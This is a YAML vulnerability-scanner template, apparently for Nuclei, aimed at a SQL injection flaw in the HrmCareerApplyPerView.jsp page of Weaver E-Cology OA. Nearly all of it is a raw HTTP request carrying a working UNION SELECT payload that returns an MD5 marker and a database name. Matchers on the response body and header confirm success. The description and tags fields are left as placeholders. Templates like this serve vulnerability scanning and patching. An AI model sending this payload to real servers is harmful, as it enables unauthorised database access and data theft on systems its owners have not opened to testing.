id: ecology-HrmCareerApplyPerView-sqli
info:
  name: ecology-HrmCareerApplyPerView.jsp-sqli
  author: mhb17
  severity: high
  description: description
  reference:
    - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20HrmCareerApplyPerView.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
  tags: tags
requests:
  - raw:
      - |+
        GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27abc%27)),db_name(1),5,6,7 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
        Connection: close
        Accept: */*
        Accept-Language: en
        Accept-Encoding: gzip, deflate

    matchers-condition: and
    matchers:
      - type: binary
        part: body
        binary:
          - 2020202020203c74723e0d0a0920202020202020203c544420636c6173733d46
      - type: word
        part: header
        words:
          - '200'